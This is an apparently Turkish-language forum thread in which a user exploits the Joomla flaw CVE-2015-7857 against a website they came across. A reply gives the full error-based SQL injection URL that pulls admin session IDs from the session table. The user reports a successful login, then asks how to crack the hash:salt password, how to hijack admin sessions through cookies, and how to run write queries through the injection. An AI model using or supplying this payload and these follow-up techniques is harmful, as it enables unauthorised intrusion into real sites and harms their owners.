




Joomla Admin Şifresi - Session
-
merhebalar altaki sorudaki sorunu çözdüm ve siteye giriş yaptım fakat bir sıkıntım var :D
joomla tablolarının içindeki users tablosundan admin şifresini çekyiorum fakat {hash}:{salt} şeklinde doğal olarak bunu kırmanın yolu varmıdır ?
bir de session tablosunu çekip içindeki bilgiyi cookie managerdan girerek admin girişi sağlamaya çalışıyorum yine olmuyor.
sql le tüm tabloları görebiliyorum ama paneli giremiyorum bunu nasıl başarabilirz :D
ek bir soru: sql inj de update insert delete sorgularını gerçekleştirmenin bir yolu varmı ?
eski konu başlığı: Joomla session hijacking CVE-2015-7857
Merhabalar bir web sitesi üstünde öylesine bakınıyordum şu açığı gördüm ilk linki yazdım ve sonuç aldım ama videoda tam olarak 2. linkteki yazıyı tam göremiyorum nette biraz araştırdım ama bir türlü cümlenin sonunu bulamadım bu konuda yardım edebilecek varmı ?
video link : https://www.youtube.com/watch?v=PBZsl2X3ZXo
-
joomla hack olaylarından bir türlü kendini sıyıramadı gitti :) yıllardır böyleler
-
Bu açık adı sanı belli o yüzden farklı dilden epey örnek bulunabilir. Ben onlara bakıp sadece açığın kontrolünü yapan, sesionId'yi ekrana basmayan örnekler olduğundan buraya sorduğunu varsayıyorum. Yok değilse ayıptır sabah sabah :/
Tam görünmeyen kısım URL'nin son parametresindeki SQL sorgusunun bir kısmı. Bu kısımda girilenler videoda 02:04'de hata mesajında açıkça görünüyor. Sağlamasını aşağıda resimde göreceğin şekilde yaptım.
Tam hali de bu:
index.php?option=com_contenthistory&view=history&list[select]=(select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from i1q45_session where guest = 0 limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id
-
buzukatak bunu yazdı
Bu açık adı sanı belli o yüzden farklı dilden epey örnek bulunabilir. Ben onlara bakıp sadece açığın kontrolünü yapan, sesionId'yi ekrana basmayan örnekler olduğundan buraya sorduğunu varsayıyorum. Yok değilse ayıptır sabah sabah :/
Tam görünmeyen kısım URL'nin son parametresindeki SQL sorgusunun bir kısmı. Bu kısımda girilenler videoda 02:04'de hata mesajında açıkça görünüyor. Sağlamasını aşağıda resimde göreceğin şekilde yaptım.
Tam hali de bu:
index.php?option=com_contenthistory&view=history&list[select]=(select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from i1q45_session where guest = 0 limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id
hocam saolasın giriş başarılı şekilde yapıldı :)
-
soruyu değiştirdim konu fazlalığı olmasın diyerek up olsun